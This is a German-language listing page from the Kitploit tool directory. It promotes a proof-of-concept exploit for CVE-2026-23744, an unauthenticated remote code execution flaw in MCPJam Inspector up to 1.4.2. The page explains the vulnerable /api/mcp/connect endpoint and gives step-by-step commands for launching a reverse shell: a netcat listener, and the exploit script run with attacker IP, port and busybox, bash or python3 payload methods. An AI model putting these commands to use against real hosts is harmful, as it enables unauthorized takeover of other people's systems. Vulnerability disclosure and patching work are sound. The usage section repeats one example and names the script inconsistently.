Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — Proof-of-Concept-Exploit für eine nicht authentifizierte Remote-Code-Execution-Schwachstelle in MCPJam Inspector <= 1.4.2. | Kitploit
Tools/GitHubGitHub/0xsoulaimane/cve-2026-23744-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHub0xsoulaimane/cve-2026-23744-poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

CVE-2026-23744-POC

CVE-2026-23744 — Proof-of-Concept-Exploit für eine nicht authentifizierte Remote-Code-Execution-Schwachstelle in MCPJam Inspector <= 1.4.2.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft
Teilen

CVE-2026-23744 — MCPJam Inspector Unauthentifizierte RCE

Python CVE Platform

MCPJam Inspector <= 1.4.2 bindet standardmäßig an 0.0.0.0 und stellt /api/mcp/connect ohne jegliche Authentifizierung bereit. Der Endpunkt akzeptiert ein serverConfig-Objekt, das direkt einen Prozess auf dem Host startet — die Übergabe einer Reverse-Shell-Payload ermöglicht sofortige RCE ohne erforderliche Anmeldedaten.


Voraussetzungen

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
FlagBeschreibungStandard
-uZiel-URLerforderlich
-iIhre Listener-IP (LHOST)erforderlich
-pIhr Listener-Port (LPORT)erforderlich
-mPayload-Methode: busybox, bash, python3busybox

Reverse-Shell-Beispiel

Schritt 1 — Starten Sie Ihren Listener:

root@kitploit:~
nc -lvnp 4444

Schritt 2 — Führen Sie den Exploit aus:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Payload-Methoden

Wenn busybox auf dem Ziel nicht funktioniert, versuchen Sie die anderen Methoden:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Betroffene Versionen

SoftwareAnfälligBehoben
MCPJam Inspector<= 1.4.21.4.3

Referenzen

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Tool herunterladen